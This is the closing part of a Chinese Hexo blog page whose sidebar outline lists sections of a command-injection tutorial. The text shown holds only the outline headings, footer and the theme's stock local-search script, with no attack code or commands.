class="nav-item nav-level-4"><a class="nav-link" href="#通配符绕过"><span class="nav-number">3.3.7.</span> <span class="nav-text">通配符绕过</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#无回显的命令执行"><span class="nav-number">3.4.</span> <span class="nav-text">无回显的命令执行</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#反弹shell"><span class="nav-number">3.4.1.</span> <span class="nav-text">反弹shell</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#DNSLOG"><span class="nav-number">3.4.2.</span> <span class="nav-text">DNSLOG</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#curl上传文件"><span class="nav-number">3.4.3.</span> <span class="nav-text">curl上传文件</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#短命令执行"><span class="nav-number">3.5.</span> <span class="nav-text">短命令执行</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#IP绕过"><span class="nav-number">3.6.</span> <span class="nav-text">IP绕过</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞防范"><span class="nav-number">4.</span> <span class="nav-text">漏洞防范</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#命令防注入函数"><span class="nav-number">4.1.</span> <span class="nav-text">命令防注入函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#参数白名单"><span class="nav-number">4.2.</span> <span class="nav-text">参数白名单</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#参考文章"><span class="nav-number">5.</span> <span class="nav-text">参考文章</span></a></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>
  


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Azeroth</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">站点总字数：</span>
    
    <span title="站点总字数">166k</span>
  

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    
      <span class="post-meta-item-text">站点阅读时长 &asymp;</span>
    
    <span title="站点阅读时长">2:31</span>
  
</div>


  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.8.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> v7.1.2</div>



<span id="busuanzi_container_site_uv">
  本站访问次数：<span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
</span>
        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  

  

  
</div>









        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  <script src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/js/utils.js?v=7.1.2"></script>

  <script src="/js/motion.js?v=7.1.2"></script>



  
  


  <script src="/js/affix.js?v=7.1.2"></script>

  <script src="/js/schemes/pisces.js?v=7.1.2"></script>




  
  <script src="/js/scrollspy.js?v=7.1.2"></script>
<script src="/js/post-details.js?v=7.1.2"></script>



  


  <script src="/js/next-boot.js?v=7.1.2"></script>


  

  

  

  


  


  
  <script>
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url).replace(/\/{2,}/g, '/');
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x"></i></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x"></i></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  

  

  

  

  

  

  

  

  

  

  

</body>
</html>
